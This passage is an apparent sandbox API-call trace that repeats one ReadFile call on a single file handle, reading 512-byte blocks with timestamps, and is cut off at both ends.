lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.084] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.085] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, 
lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.086] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile 
(in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.087] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 
[0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.088] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, 
lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 
lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.089] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: 
lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.090] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, 
lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, 
lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: 